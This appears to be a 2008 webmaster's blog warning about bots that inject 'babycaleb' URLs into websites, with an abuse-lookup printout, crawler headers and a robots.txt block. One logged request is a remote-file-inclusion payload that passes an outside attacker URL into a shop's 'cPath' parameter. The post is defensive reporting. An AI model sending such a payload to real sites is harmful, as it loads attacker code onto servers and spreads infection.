Nov 20, 2008

babycaleb.mvhosted.com hacker atacks

Baby hacker has moved to http://babycaleb.mvhosted.com

And his baby bots are now trying to inject this new url into websites.
The site when inspected using Spam Spade to avoid any virus infection shows the exploit is in the html just like before.

A search shows its infected many websites. http://www.google.com
Parsing input: http://babycaleb.mvhosted.com
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Routing details for 74.53.187.178
[refresh/show] Cached whois for 74.53.187.178 : abuse@theplanet.com
Using abuse net on abuse@theplanet.com
abuse net theplanet.com = abuse@theplanet.com
Using best contacts abuse@theplanet.com


Send abuse messages to theplanet.com

Nov 12, 2008

itsapic.com/crawler.html another beta

208.43.85.166
Required header 'Accept' missing GET / HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)
Connection: close
Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx


This bot was scanning webing looking for sites and got blocked by BB so watch for it.
Website does not tell what its doing or ask permission to enter your site.


add to robots
User-agent: itsapic.com_crawler
Disallow: /

Nov 8, 2008

babycaleb.fortunecity.co.uk hacker now shut down.

Am getting a lot of these request lately

/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm

They are from lots of IPS all trying to remote load this page. Inside that page is a hack atempt. AVG gives an alarm if you try to view the source.

Do not go to the website babycaleb.fortunecity.co.uk AVG detects a virus but it still gets into your system. Look for ..
c:\windows\system32\tools\regexe.exe
a trojan horse downloader.generic8.cox

--updated-
The site has now been shutdown.

A search of google
http://www.google.com/search?q=babycaleb.fortunecity.co.uk shows that sites all over the net are infected with this atack and they are allowing the atack to spread. Perhaps they are involved in the atack?